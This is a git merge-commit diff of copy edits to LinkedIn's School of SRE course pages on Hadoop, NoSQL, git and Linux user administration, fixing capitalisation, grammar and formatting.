Merge branch 'main' into sql

This commit is contained in:
Sumesh Premraj 2020-11-26 21:23:09 +05:30 committed by GitHub
commit b47296da00
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
31 changed files with 243 additions and 227 deletions

View File

@ -3,3 +3,12 @@ We realise that the initial content we created is just a starting point and our
As a contributor, you represent that the content you submit is not plagiarised. By submitting the content, you (and, if applicable, your employer) are licensing the submitted content to LinkedIn and the open source community subject to the BSD 2-Clause license.
We suggest to open an issue first and seek advice for your changes before submitting a pull request.
### Building and testing locally
Run the following commands to build and view the site locally before opening a PR.
```
pip install -r requirements.txt
mkdocs build
mkdocs serve
```

View File

@ -5,14 +5,14 @@
# Architecture of Hadoop
1. **HDFS**
1. The Hadoop Distributed File System (HDFS) is a distributed file system designed to run on commodity hardware. It has many similarities with existing distributed file systems. However, the differences from other distributed file systems are significant.
2. HDFS is highly fault-tolerant and is designed to be deployed on low-cost hardware. HDFS provides high throughput access to application data and is suitable for applications that have large data sets.
1. The Hadoop Distributed File System (HDFS) is a distributed file system designed to run on commodity hardware. It has many similarities with existing distributed file systems. However, the differences from other distributed file systems are significant.
2. HDFS is highly fault-tolerant and is designed to be deployed on low-cost hardware. HDFS provides high throughput access to application data and is suitable for applications that have large data sets.
3. HDFS is part of the [Apache Hadoop Core project](https://github.com/apache/hadoop).
![HDFS Architecture](images/hdfs_architecture.png)
1. NameNode: is the arbitrator and central repository of file namespace in the cluster. The NameNode executes the operations such as opening, closing, and renaming files and directories.
2. DataNode: manages the storage attached to the node on which it runs. It is responsible for serving all the read and write requests. It performs operations on instructions on NameNode such as creation, deletion, and replications of blocks.
2. DataNode: manages the storage attached to the node on which it runs. It is responsible for serving all the read and writes requests. It performs operations on instructions on NameNode such as creation, deletion, and replications of blocks.
3. Client: Responsible for getting the required metadata from the namenode and then communicating with the datanodes for reads and writes. </br></br></br>
2. **YARN**
@ -25,29 +25,29 @@
2. Resource Manager: It is the master daemon of YARN and is responsible for resource assignment and management among all the applications. Whenever it receives a processing request, it forwards it to the corresponding node manager and allocates resources for the completion of the request accordingly. It has two major components:
3. Scheduler: It performs scheduling based on the allocated application and available resources. It is a pure scheduler, which means that it does not perform other tasks such as monitoring or tracking and does not guarantee a restart if a task fails. The YARN scheduler supports plugins such as Capacity Scheduler and Fair Scheduler to partition the cluster resources.
4. Application manager: It is responsible for accepting the application and negotiating the first container from the resource manager. It also restarts the Application Manager container if a task fails.
5. Node Manager: It takes care of individual nodes on the Hadoop cluster and manages application and workflow and that particular node. Its primary job is to keep-up with the Node Manager. It monitors resource usage, performs log management and also kills a container based on directions from the resource manager. It is also responsible for creating the container process and starting it on the request of the Application master.
6. Application Master: An application is a single job submitted to a framework. The application manager is responsible for negotiating resources with the resource manager, tracking the status and monitoring progress of a single application. The application master requests the container from the node manager by sending a Container Launch Context(CLC) which includes everything an application needs to run. Once the application is started, it sends the health report to the resource manager from time-to-time.
7. Container: It is a collection of physical resources such as RAM, CPU cores and disk on a single node. The containers are invoked by Container Launch Context(CLC) which is a record that contains information such as environment variables, security tokens, dependencies etc. </br></br>
5. Node Manager: It takes care of individual nodes on the Hadoop cluster and manages application and workflow and that particular node. Its primary job is to keep up with the Node Manager. It monitors resource usage, performs log management, and also kills a container based on directions from the resource manager. It is also responsible for creating the container process and starting it at the request of the Application master.
6. Application Master: An application is a single job submitted to a framework. The application manager is responsible for negotiating resources with the resource manager, tracking the status, and monitoring the progress of a single application. The application master requests the container from the node manager by sending a Container Launch Context(CLC) which includes everything an application needs to run. Once the application is started, it sends the health report to the resource manager from time-to-time.
7. Container: It is a collection of physical resources such as RAM, CPU cores, and disk on a single node. The containers are invoked by Container Launch Context(CLC) which is a record that contains information such as environment variables, security tokens, dependencies, etc. </br></br>
# MapReduce framework
![MapReduce Framework](images/map_reduce.jpg)
1. The term MapReduce represents two separate and distinct tasks Hadoop programs perform-Map Job and Reduce Job. Map jobs take data sets as input and process them to produce key value pairs. Reduce job takes the output of the Map job i.e. the key value pairs and aggregates them to produce desired results.
2. Hadoop MapReduce (Hadoop Map/Reduce) is a software framework for distributed processing of large data sets on computing clusters. Mapreduce helps to split the input data set into a number of parts and run a program on all data parts parallel at once.
3. Please find the below Word count example demonstrating the usage of MapReduce framework:
1. The term MapReduce represents two separate and distinct tasks Hadoop programs perform-Map Job and Reduce Job. Map jobs take data sets as input and process them to produce key-value pairs. Reduce job takes the output of the Map job i.e. the key-value pairs and aggregates them to produce desired results.
2. Hadoop MapReduce (Hadoop Map/Reduce) is a software framework for distributed processing of large data sets on computing clusters. Mapreduce helps to split the input data set into a number of parts and run a program on all data parts parallel at once.
3. Please find the below Word count example demonstrating the usage of the MapReduce framework:
![Word Count Example](images/mapreduce_example.jpg)
</br></br>
# Other tooling around hadoop
# Other tooling around Hadoop
1. [**Hive**](https://hive.apache.org/)
1. Uses a language called HQL which is very SQL like. Gives non-programmers the ability to query and analyze data in Hadoop. Is basically an abstraction layer on top of map-reduce.
2. Ex. HQL query:
2. Ex. HQL query:
1. _SELECT pet.name, comment FROM pet JOIN event ON (pet.name = event.name);_
3. In mysql:
3. In mysql:
1. _SELECT pet.name, comment FROM pet, event WHERE pet.name = event.name;_
2. [**Pig**](https://pig.apache.org/)
1. Uses a scripting language called Pig Latin, which is more workflow driven. Don't need to be an expert Java programmer but need a few coding skills. Is also an abstraction layer on top of map-reduce.
@ -66,7 +66,7 @@
3. [**Spark**](https://spark.apache.org/)
1. Spark provides primitives for in-memory cluster computing that allows user programs to load data into a clusters memory and query it repeatedly, making it well suited to machine learning algorithms.
4. [**Presto**](https://prestodb.io/)
1. Presto is a high performance, distributed SQL query engine for Big Data.
1. Presto is a high performance, distributed SQL query engine for Big Data.
2. Its architecture allows users to query a variety of data sources such as Hadoop, AWS S3, Alluxio, MySQL, Cassandra, Kafka, and MongoDB.
3. Example presto query:
```mysql
@ -80,4 +80,4 @@
1. In order to transport the data over the network or to store on some persistent storage, we use the process of translating data structures or objects state into binary or textual form. We call this process serialization..
2. Avro data is stored in a container file (a .avro file) and its schema (the .avsc file) is stored with the data file.
3. Apache Hive provides support to store a table as Avro and can also query data in this serialisation format.
3. Apache Hive provides support to store a table as Avro and can also query data in this serialisation format.

View File

@ -7,7 +7,7 @@
## What to expect from this course
This course covers the basics of Big Data and how it has evolved to become what it is today. We will take a look at a few realistic scenarios where Big Data would be a perfect fit. An interesting assignment on designing a Big Data system is followed by understanding the architecture of Hadoop and the tooling around it.
This course covers the basics of Big Data and how it has evolved to become what it is today. We will take a look at a few realistic scenarios where Big Data would be a perfect fit. An interesting assignment on designing a Big Data system is followed by understanding the architecture of Hadoop and the tooling around it.
## What is not covered under this course
@ -32,7 +32,7 @@ Writing programs to draw analytics from data.
# Overview of Big Data
1. Big Data is a collection of large datasets that cannot be processed using traditional computing techniques. It is not a single technique or a tool, rather it has become a complete subject, which involves various tools, techniques and frameworks.
1. Big Data is a collection of large datasets that cannot be processed using traditional computing techniques. It is not a single technique or a tool, rather it has become a complete subject, which involves various tools, techniques, and frameworks.
2. Big Data could consist of
1. Structured data
2. Unstructured data
@ -50,9 +50,8 @@ Writing programs to draw analytics from data.
1. Take the example of the traffic lights problem.
1. There are more than 300,000 traffic lights in the US as of 2018.
2. Let us assume that we placed a device on each of them to collect metrics and send it to a central metrics collection system.
3. If each of the IOT devices sends 10 events per minute, we have 300000x10x60x24 = 432x10^7 events per day.
3. If each of the IoT devices sends 10 events per minute, we have 300000x10x60x24 = 432x10^7 events per day.
4. How would you go about processing that and telling me how many of the signals were “green” at 10:45 am on a particular day?
2. Consider the next example on Unified Payments Interface (UPI) transactions:
1. We had about 1.15 billion UPI transactions in the month of October, 2019 in India.
1. We had about 1.15 billion UPI transactions in the month of October 2019 in India.
12. If we try to extrapolate this data to about a year and try to find out some common payments that were happening through a particular UPI ID, how do you suggest we go about that?

View File

@ -1,8 +1,8 @@
# Tasks and conclusion
## Post training tasks:
## Post-training tasks:
1. Try setting up your own 3 node hadoop cluster.
1. Try setting up your own 3 node Hadoop cluster.
1. A VM based solution can be found [here](http://hortonworks.com/wp-content/uploads/2015/04/Import_on_VBox_4_07_2015.pdf)
2. Write a simple spark/MR job of your choice and understand how to generate analytics from data.
1. Sample dataset can be found [here](https://grouplens.org/datasets/movielens/)
@ -11,4 +11,4 @@
1. [Hadoop documentation](http://hadoop.apache.org/docs/current/)
2. [HDFS Architecture](http://hadoop.apache.org/docs/current/hadoop-project-dist/hadoop-hdfs/HdfsDesign.html)
3. [YARN Architecture](http://hadoop.apache.org/docs/current/hadoop-yarn/hadoop-yarn-site/YARN.html)
4. [Google GFS paper](https://storage.googleapis.com/pub-tools-public-publication-data/pdf/035fc972c796d33122033a0614bc94cff1527999.pdf)
4. [Google GFS paper](https://storage.googleapis.com/pub-tools-public-publication-data/pdf/035fc972c796d33122033a0614bc94cff1527999.pdf)

View File

@ -38,10 +38,10 @@ Over time due to the way these NoSQL databases were developed to suit requiremen
1. **Document databases: **They store data in documents similar to [JSON](https://www.json.org/json-en.html) (JavaScript Object Notation) objects. Each document contains pairs of fields and values. The values can typically be a variety of types including things like strings, numbers, booleans, arrays, or objects, and their structures typically align with objects developers are working with in code. The advantages include intuitive data model & flexible schemas. Because of their variety of field value types and powerful query languages, document databases are great for a wide variety of use cases and can be used as a general purpose database. They can horizontally scale-out to accomodate large data volumes. Ex: MongoDB, Couchbase
1. **Document databases:** They store data in documents similar to [JSON](https://www.json.org/json-en.html) (JavaScript Object Notation) objects. Each document contains pairs of fields and values. The values can typically be a variety of types including things like strings, numbers, booleans, arrays, or objects, and their structures typically align with objects developers are working with in code. The advantages include intuitive data model & flexible schemas. Because of their variety of field value types and powerful query languages, document databases are great for a wide variety of use cases and can be used as a general purpose database. They can horizontally scale-out to accomodate large data volumes. Ex: MongoDB, Couchbase
2. **Key-Value databases:** These are a simpler type of databases where each item contains keys and values. A value can typically only be retrieved by referencing its value, so learning how to query for a specific key-value pair is typically simple. Key-value databases are great for use cases where you need to store large amounts of data but you dont need to perform complex queries to retrieve it. Common use cases include storing user preferences or caching. Ex: [Redis](https://redis.io/), [DynamoDB](https://aws.amazon.com/dynamodb/), [Voldemort](https://www.project-voldemort.com/voldemort/)/[Venice](https://engineering.linkedin.com/blog/2017/04/building-venice--a-production-software-case-study) (Linkedin),
3. **Wide-Column stores:** They store data in tables, rows, and dynamic columns. Wide-column stores provide a lot of flexibility over relational databases because each row is not required to have the same columns. Many consider wide-column stores to be two-dimensional key-value databases. Wide-column stores are great for when you need to store large amounts of data and you can predict what your query patterns will be. Wide-column stores are commonly used for storing Internet of Things data and user profile data. [Cassandra](https://cassandra.apache.org/) and [HBase](https://hbase.apache.org/) are two of the most popular wide-column stores.
4. Graph Databases: These databases store data in nodes and edges. Nodes typically store information about people, places, and things while edges store information about the relationships between the nodes. The underlying storage mechanism of graph databases can vary. Some depend on a relational engine and “store” the graph data in a table (although a table is a logical element, therefore this approach imposes another level of abstraction between the graph database, the graph database management system and the physical devices where the data is actually stored). Others use a key-value store or document-oriented database for storage, making them inherently NoSQL structures. Graph databases excel in use cases where you need to traverse relationships to look for patterns such as social networks, fraud detection, and recommendation engines. Ex: [Neo4j](https://neo4j.com/)
4. **Graph Databases:** These databases store data in nodes and edges. Nodes typically store information about people, places, and things while edges store information about the relationships between the nodes. The underlying storage mechanism of graph databases can vary. Some depend on a relational engine and “store” the graph data in a table (although a table is a logical element, therefore this approach imposes another level of abstraction between the graph database, the graph database management system and the physical devices where the data is actually stored). Others use a key-value store or document-oriented database for storage, making them inherently NoSQL structures. Graph databases excel in use cases where you need to traverse relationships to look for patterns such as social networks, fraud detection, and recommendation engines. Ex: [Neo4j](https://neo4j.com/)
### **Comparison**
@ -200,18 +200,18 @@ The table below summarizes the main differences between SQL and NoSQL databases.
* Flexible Data Models
* **Flexible Data Models**
Most NoSQL systems feature flexible schemas. A flexible schema means you can easily modify your database schema to add or remove fields to support for evolving application requirements. This facilitates with continuous application development of new features without database operation overhead.
* Horizontal Scaling
* **Horizontal Scaling**
Most NoSQL systems allow you to scale horizontally, which means you can add in cheaper & commodity hardware, whenever you want to scale a system. On the other hand SQL systems generally scale Vertically (a more powerful server). NoSQL systems can also host huge data sets when compared to traditional SQL systems.
* Fast Queries
* **Fast Queries**
NoSQL can generally be a lot faster than traditional SQL systems due to data denormalization and horizontal scaling. Most NoSQL systems also tend to store similar data together facilitating faster query responses.
* Developer productivity
* **Developer productivity**
NoSQL systems tend to map data based on the programming data structures. As a result developers need to perform fewer data transformations leading to increased productivity & fewer bugs.

View File

@ -32,15 +32,15 @@ NoSQL systems support different levels of eventual consistency models. For examp
* Read Your Own Writes Consistency
* **Read Your Own Writes Consistency**
A client will see his updates immediately after they are written. The reads can hit nodes other than the one where it was written. However he might not see updates by other clients immediately.
* Session Consistency:
* **Session Consistency**
A client will see the updates to his data within a session scope. This generally indicates that reads & writes occur on the same server. Other clients using the same nodes will receive the same updates.
* Casual Consistency
* **Casual Consistency**
A system provides causal consistency if the following condition holds: write operations that are related by potential causality are seen by each process of the system in order. Different processes may observe concurrent writes in different orders
@ -51,7 +51,7 @@ Eventual consistency is useful if concurrent updates of the same partitions of d
Depending on what consistency model was chosen for the system (or parts of it), determines where the requests are routed, ex: replicas.
CAP alternatives illustration
**CAP alternatives illustration**
<table>

View File

@ -2,7 +2,7 @@
Coming back to our local repo which has two commits. So far, what we have is a single line of history. Commits are chained in a single line. But sometimes you may have a need to work on two different features in parallel in the same repo. Now one option here could be making a new folder/repo with the same code and use that for another feature development. But there's a better way. Use _branches._ Since git follows tree like structure for commits, we can use branches to work on different sets of features. From a commit, two or more branches can be created and branches can also be merged.
Using branches, there can exist multiple lines of histories and we can checkout to any of them and work on it. Checking out, as we discussed earlier, would simply mean replacing contents of the directory (repo) with contents snapshot at the checked out version.
Using branches, there can exist multiple lines of histories and we can checkout to any of them and work on it. Checking out, as we discussed earlier, would simply mean replacing contents of the directory (repo) with the snapshot at the checked out version.
Let's create a branch and see how it looks like:
@ -66,7 +66,7 @@ spatel1-mn1:school-of-sre spatel1$ git log --oneline --graph
* df2fb7a adding file 1
```
Notice how branch b1 is not visible here since we are checkout on master. Let's try to visualize both to get the whole picture:
Notice how branch b1 is not visible here since we are on the master. Let's try to visualize both to get the whole picture:
```bash
spatel1-mn1:school-of-sre spatel1$ git log --oneline --graph --all

View File

@ -94,7 +94,7 @@ Notice how after adding the file, git status says `Changes to be committed:`. Wh
### More About a Commit
Commit is a snapshot of the repo. Whenever a commit is made, a snapshot of the current state of repo (the folder) is taken and saved. Each commit has a unique ID. (`df2fb7a` for the commit we made in the previous step). As we keep adding/changing more and more contents and keep making commits, all those snapshots are stored by git. Again, all this magic happens inside the `.git` folder. This is where all this snapshot or versions are stored. _In an efficient manner._
Commit is a snapshot of the repo. Whenever a commit is made, a snapshot of the current state of repo (the folder) is taken and saved. Each commit has a unique ID. (`df2fb7a` for the commit we made in the previous step). As we keep adding/changing more and more contents and keep making commits, all those snapshots are stored by git. Again, all this magic happens inside the `.git` folder. This is where all this snapshot or versions are stored _in an efficient manner._
### Adding More Changes
@ -131,7 +131,7 @@ spatel1-mn1:school-of-sre spatel1$ git log --oneline --graph
### Are commits really linked?
As I just said, the two commits we just made are linked via tree like data structure and we saw how they are linked. But let's actually verify it. Everything in git is an object. Newly created files are stored as an object. Changes to file are stored as an objects and even commits are objects. To view contents of an object we can use the following command with the object's ID. We will take a look at content of the contents of the second commit
As I just said, the two commits we just made are linked via tree like data structure and we saw how they are linked. But let's actually verify it. Everything in git is an object. Newly created files are stored as an object. Changes to file are stored as an objects and even commits are objects. To view contents of an object we can use the following command with the object's ID. We will take a look at the contents of the second commit
```bash
spatel1-mn1:school-of-sre spatel1$ git cat-file -p 7f3b00e
@ -253,4 +253,4 @@ spatel1-mn1:school-of-sre spatel1$ git log --oneline --graph
* df2fb7a adding file 1
```
We just edited the `master` reference file and now we can see only the first commit in git log. Undoing the change to the file brings the state back to original. Not so much of magic, isn't it?
We just edited the `master` reference file and now we can see only the first commit in git log. Undoing the change to the file brings the state back to original. Not so much of magic, is it?

View File

@ -22,7 +22,7 @@ applypatch-msg.sample fsmonitor-watchman.sample pre-applypatch.sample pr
commit-msg.sample post-update.sample pre-commit.sample pre-rebase.sample prepare-commit-msg.sample
```
Names are self explanatory. These hooks are useful when you want to do certain things when a certain event happens. Ie: if you want to run tests before pushing code, you would want to setup `pre-push` hooks. Let's try to create a pre commit hook.
Names are self explanatory. These hooks are useful when you want to do certain things when a certain event happens. If you want to run tests before pushing code, you would want to setup `pre-push` hooks. Let's try to create a pre commit hook.
```bash
spatel1-mn1:school-of-sre spatel1$ echo "echo this is from pre commit hook" > .git/hooks/pre-commit

View File

@ -2,26 +2,26 @@
<img src="img/sos.png" width=200 >
Early 2019, we started visiting campuses to recruit the brightest minds to ensure LinkedIn and all the services that it is composed of is always available for everyone. This function at Linkedin falls in the purview of the Site Reliability Engineering team and Site Reliability Engineers ( SRE ) who are Software Engineers who specialize in reliability. SREs apply the principles of computer science and engineering to the design and development of computer systems: generally, large distributed ones.
Early 2019, we started visiting campuses to recruit the brightest minds to ensure LinkedIn and all the services that it is composed of is always available for everyone. This function at Linkedin falls in the purview of the Site Reliability Engineering team and Site Reliability Engineers ( SRE ) who are Software Engineers who specialize in reliability. SREs apply the principles of computer science and engineering to the design and development of computer systems: generally, large distributed ones.
As we continued on this journey we started getting a lot of questions from these campuses on what exactly site engineering roll entails? and, how could someone learn the skills and the disciplines involved to become a successful site engineer? Fast forward a few months, and a few of these campus students had joined LinkedIn either as Interns or as full time engineers to become a part of the Site Engineering team, we also had a few lateral hires who joined our organization who were not from a traditional SRE background. That's when a few of us got together and started to think about how we can on board new new graduate engineers to the site engineering team.
As we continued on this journey we started getting a lot of questions from these campuses on what exactly site engineering role entails? and, how could someone learn the skills and the disciplines involved to become a successful site engineer? Fast forward a few months, and a few of these campus students had joined LinkedIn either as Interns or as full-time engineers to become a part of the Site Engineering team, we also had a few lateral hires who joined our organization who were not from a traditional SRE background. That's when a few of us got together and started to think about how we can onboard new graduate engineers to the site engineering team.
There is a vast amount of resources scattered throughout the web on what are the roles and responsibilities of an SREs, how to monitor site health, handling incidents, maintain SLO/SLI etc. But there are very few resources out there guiding someone on what all basic skill sets one has to acquire as a beginner. Because of the lack of these resources we felt that individuals are having a tough time getting into open positions in the industry. We created School Of SRE as a starting point for anyone wanting to build their career in the role of SRE.
There is a vast amount of resources scattered throughout the web on what are the roles and responsibilities of SREs are, how to monitor site health, handling incidents, maintain SLO/SLI, etc. But there are very few resources out there guiding someone on all basic skill sets one has to acquire as a beginner. Because of the lack of these resources, we felt that individuals are having a tough time getting into open positions in the industry. We created the School Of SRE as a starting point for anyone wanting to build their career in the role of SRE.
In this course we are focusing on building strong foundational skills. The course is structured in a way to provide more real life examples and how learning each of the topics can play a bigger role in your day to day SRE life. Currently we are covering the following topics under the School Of SRE:
- Fundamentals Series
- [Linux Basics](https://linkedin.github.io/school-of-sre/linux_basics/intro/)
- [Git](https://linkedin.github.io/school-of-sre/git/git-basics/)
- [Linux Networking](https://linkedin.github.io/school-of-sre/linux_networking/intro/)
- [Python and Web](https://linkedin.github.io/school-of-sre/python_web/intro/)
- Data
- Fundamentals Series
- [Linux Basics](https://linkedin.github.io/school-of-sre/linux_basics/intro/)
- [Git](https://linkedin.github.io/school-of-sre/git/git-basics/)
- [Linux Networking](https://linkedin.github.io/school-of-sre/linux_networking/intro/)
- [Python and Web](https://linkedin.github.io/school-of-sre/python_web/intro/)
- Data
- [Relational databases(MySQL)](https://linkedin.github.io/school-of-sre/databases_sql/intro/)
- [NoSQL concepts](https://linkedin.github.io/school-of-sre/databases_nosql/intro/)
- [Big Data](https://linkedin.github.io/school-of-sre/big_data/intro/)
- [Systems Design](https://linkedin.github.io/school-of-sre/systems_design/intro/)
- [Security](https://linkedin.github.io/school-of-sre/security/intro/)
- [NoSQL concepts](https://linkedin.github.io/school-of-sre/databases_nosql/intro/)
- [Big Data](https://linkedin.github.io/school-of-sre/big_data/intro/)
- [Systems Design](https://linkedin.github.io/school-of-sre/systems_design/intro/)
- [Security](https://linkedin.github.io/school-of-sre/security/intro/)
We believe continuous learning will help in acquiring deeper knowledge and competencies in order to expand your skill sets, every module has added reference which could be a guide for further learning. Our hope is that by going through these modules we should be able build the essential skills required for a Site Reliability Engineer.
We believe continuous learning will help in acquiring deeper knowledge and competencies in order to expand your skill sets, every module has added reference which could be a guide for further learning. Our hope is that by going through these modules we should be able to build the essential skills required for a Site Reliability Engineer.
At Linkedin we are using this curriculum for onboarding our non-traditional hires and new college grads to the SRE role. We had multiple rounds of successful onboarding experience with the new members and helped them to be productive in a very short period of time. This motivated us to opensource these contents for helping other organisations onboarding new engineers to the role and individuals to get into the role. We realise that the initial content we created is just a starting point and our hope is that the community can help in the journey refining and extending the contents.
At Linkedin, we are using this curriculum for onboarding our non-traditional hires and new college grads to the SRE role. We had multiple rounds of successful onboarding experience with the new members and helped them to be productive in a very short period of time. This motivated us to opensource these contents for helping other organizations onboarding new engineers to the role and individuals to get into the role. We realize that the initial content we created is just a starting point and we hope that the community can help in the journey of refining and extending the contents.

View File

@ -1,7 +1,7 @@
# Conclusion
With this we have covered the basics of linux operating systems along with basic commands
which are used in linux. We have also covered the linux server administration commands.
We have covered the basics of Linux operating systems and basic commands used in linux.
We have also covered the Linux server administration commands.
We hope that this course will make it easier for you to operate on the command line.

Binary file not shown.

Before

Width:  |  Height:  |  Size: 52 KiB

After

Width:  |  Height:  |  Size: 59 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 49 KiB

After

Width:  |  Height:  |  Size: 88 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 43 KiB

After

Width:  |  Height:  |  Size: 36 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 56 KiB

After

Width:  |  Height:  |  Size: 74 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 56 KiB

After

Width:  |  Height:  |  Size: 72 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 60 KiB

After

Width:  |  Height:  |  Size: 80 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 60 KiB

After

Width:  |  Height:  |  Size: 74 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 34 KiB

After

Width:  |  Height:  |  Size: 34 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 41 KiB

After

Width:  |  Height:  |  Size: 45 KiB

View File

@ -1,31 +1,32 @@
# Introduction
# Linux Basics
## Prerequisites
## Introduction
### Prerequisites
- Experience of working on any operating systems like Windows, Linux or Mac
- Basics of operating system
- Comfortable using any operating systems like Windows, Linux or Mac
- Fundamental knowledge of operating systems
## What to expect from this course
This course is divided into three parts. In the first part, we will cover the
fundamentals of linux operating systems. We will talk about linux architecture,
linux distributions and uses of linux operating systems. We will also talk about
This course is divided into three parts. In the first part, we cover the
fundamentals of Linux operating systems. We will talk about Linux architecture,
Linux distributions and uses of Linux operating systems. We will also talk about the
difference between GUI and CLI.
In the second part, we will study about some of the basic commands that are used
in linux. We will focus on commands used for navigating file system, commands used
for manipulating files, commands used for viewing files, I/O redirection etc.
In the second part, we cover some basic commands used in Linux.
We will focus on commands used for navigating the file system, viewing and manipulating files,
I/O redirection etc.
In the third part, we will study about linux system administration. In this part, we
will focus on day to day tasks performed by linux admins like managing users/groups,
managing file permissions, monitoring system performance, log files etc.
In the third part, we cover Linux system administration. This includes day to day tasks
performed by Linux admins, like managing users/groups, managing file permissions,
monitoring system performance, log files etc.
In the second and third part, we will be taking examples to understand the concepts.
## What is not covered under this course
We are not covering advanced linux commands and bash scripting in this
course. We will also not be covering linux internals.
We are not covering advanced Linux commands and bash scripting in this
course. We will also not be covering Linux internals.
## Course Contents
@ -64,16 +65,18 @@ The following topics has been covered in this course:
## What are Linux operating systems
Most of us will be familiar with the windows operating system which is
used in more than 75% of the personal computers. The windows operating systems
are based on windows NT kernel. A kernel is the most important part of
an operating system which performs important functions like process
Most of us are familiar with the Windows operating system used in more than
75% of the personal computers. The Windows operating systems
are based on Windows NT kernel.
A kernel is the most important part of
an operating system - it performs important functions like process
management, memory management, filesystem management etc.
Linux operating systems are based on the Linux kernel. A linux based
operating system will consist of linux kernel, GUI/CLI, system libraries
Linux operating systems are based on the Linux kernel. A Linux based
operating system will consist of Linux kernel, GUI/CLI, system libraries
and system utilities. The Linux kernel was independently developed and
released by Linus Torvalds. The linux kernel is free and open-source -
released by Linus Torvalds. The Linux kernel is free and open-source -
[https://github.com/torvalds/linux](https://github.com/torvalds/linux)
History of Linux -
@ -81,12 +84,12 @@ History of Linux -
## What are popular Linux distributions
A linux distribution(distro) is an operating system that is based on
the linux kernel and a package management system. A package management
system consists of tools that helps in installing, upgrading,
A Linux distribution(distro) is an operating system based on
the Linux kernel and a package management system. A package management
system consists of tools that help in installing, upgrading,
configuring and removing softwares on the operating system.
Softwares are usually adopted to a distribution and are packaged in a
Software are usually adopted to a distribution and are packaged in a
distro specific format. These packages are available through a distro
specific repository. Packages are installed and managed in the operating
system by a package manager.
@ -119,7 +122,7 @@ system by a package manager.
- The Linux kernel is monolithic in nature.
- System calls are used to interact with the linux kernel space.
- System calls are used to interact with the Linux kernel space.
- Kernel code can only be executed in the kernel mode. Non-kernel code is executed in the user mode.
@ -127,13 +130,13 @@ system by a package manager.
## Uses of Linux Operating Systems
Operating system based on linux kernel are widely used in:
Operating system based on Linux kernel are widely used in:
- Personal computers
- Servers
- Mobile phones - Android is based on linux operating system
- Mobile phones - Android is based on Linux operating system
- Embedded devices - watches, televisions, traffic lights etc
@ -159,10 +162,10 @@ to perform a particular operation.
## Shell vs Terminal
Shell is a program that takes command or a group of commands from the
Shell is a program that takes commands from the
users and gives them to the operating system for processing. Shell is an
example of command line interface. Bash is one of the most popular shell
programs available on linux servers. Other popular shell programs are
example of a CLI(command line interface). Bash is one of the most popular shell
programs available on Linux servers. Other popular shell programs are
zsh, ksh and tcsh.
Terminal is a program that opens a window and lets you interact with the

View File

@ -3,7 +3,7 @@
In this course will try to cover some of the common tasks that a linux
server administrator performs. We will first try to understand what a
particular command does and then try to understand the commands using
examples. Do keep in mind that it's very important to practice the linux
examples. Do keep in mind that it's very important to practice the Linux
commands on your own.
## Lab Environment Setup
@ -14,20 +14,20 @@ commands on your own.
![](images/linux/admin/image19.png)
- We will run most of the commands used in this module in the above docker container.
- We will run most of the commands used in this module in the above Docker container.
## Multi-User Operating Systems
An operating system is considered as multi-user if it allows multiple people/users to use a computer and not affect each other files and preferences. Linux based operating systems are multi-user in nature as it allows multiple users to access the system at the same time. A typical computer will only have one keyboard and monitor but multiple users can log in via ssh if the computer is connected to the network. We will cover more about ssh later.
An operating system is considered as multi-user if it allows multiple people/users to use a computer and not affect each other's files and preferences. Linux based operating systems are multi-user in nature as it allows multiple users to access the system at the same time. A typical computer will only have one keyboard and monitor but multiple users can log in via SSH if the computer is connected to the network. We will cover more about SSH later.
As a server administrator, we are mostly concerned with the linux servers which are physically present at a very large distance from us. We can connect to these servers with the help of remote login methods like ssh.
As a server administrator, we are mostly concerned with the Linux servers which are physically present at a very large distance from us. We can connect to these servers with the help of remote login methods like SSH.
Since linux supports multiple users, we need to have a method which can protect the users from each other. One user should not be able to access and modify files of other users
Since Linux supports multiple users, we need to have a method which can protect the users from each other. One user should not be able to access and modify files of other users
## User/Group Management
- Each user in linux has an associated user ID called UID attached to him
- Each user in Linux has an associated user ID called UID attached to him
- Each user also has a home directory and a login shell associated with him/her
@ -37,13 +37,13 @@ Since linux supports multiple users, we need to have a method which can protect
### id command
id command can be used to find the uid and gid associated with an user.
`id` command can be used to find the uid and gid associated with an user.
It also lists down the groups to which the user belongs to.
The uid and gid associated with the root user is 0.
![](images/linux/admin/image30.png)
A good way to find out the current user in linux is to use the whoami
A good way to find out the current user in Linux is to use the whoami
command.
![](images/linux/admin/image35.png)
@ -74,19 +74,19 @@ through below links:
## Important commands for managing users
Some of the commands which are used frequently to manage users/groups
on linux are following:
on Linux are following:
- useradd - Creates a new user
- `useradd` - Creates a new user
- passwd - Adds or modifies passwords for a user
- `passwd` - Adds or modifies passwords for a user
- usermod - Modifies attributes of an user
- `usermod` - Modifies attributes of an user
- userdel - Deletes an user
- `userdel` - Deletes an user
### useradd
The useradd command adds a new user in linux.
The useradd command adds a new user in Linux.
We will create a new user 'shivam'. We will also verify that the user
has been created by tailing the /etc/passwd file. The uid and gid are
@ -141,7 +141,7 @@ Try 'usermod -h' for a list of attributes you can modify.
### userdel
The userdel command is used to remove a user on linux. Once we remove a
The userdel command is used to remove a user on Linux. Once we remove a
user, all the information related to that user will be removed.
Let's try to delete the user "amit". After deleting the user, you will
@ -172,7 +172,7 @@ We will now try to add user "shivam" to the group we have created above.
password for user "shivam" and user "root" using the passwd command
described in the above section.**
The su command can be used to switch users in linux. Let's now try to
The su command can be used to switch users in Linux. Let's now try to
switch to user "shivam".
![](images/linux/admin/image37.png)
@ -182,7 +182,7 @@ Let's now try to open the "/etc/shadow" file.
![](images/linux/admin/image29.png)
The operating system didn't allow the user "shivam" to read the content
of the "/etc/shadow" file. This is an important file in linux which
of the "/etc/shadow" file. This is an important file in Linux which
stores the passwords of users. This file can only be accessed by root or
users who have the superuser privileges.
@ -224,7 +224,7 @@ commands from anywhere.
One easy way of providing root access to users is to add them to a group
which has permissions to run all the commands. "wheel" is a group in
redhat linux with such privileges.
redhat Linux with such privileges.
![](images/linux/admin/image25.png)
@ -245,7 +245,7 @@ to user “shivam” by adding him to the group “wheel”.
## File Permissions
On a linux operating system, each file and directory is assigned access
On a Linux operating system, each file and directory is assigned access
permissions for the owner of the file, the members of a group of related
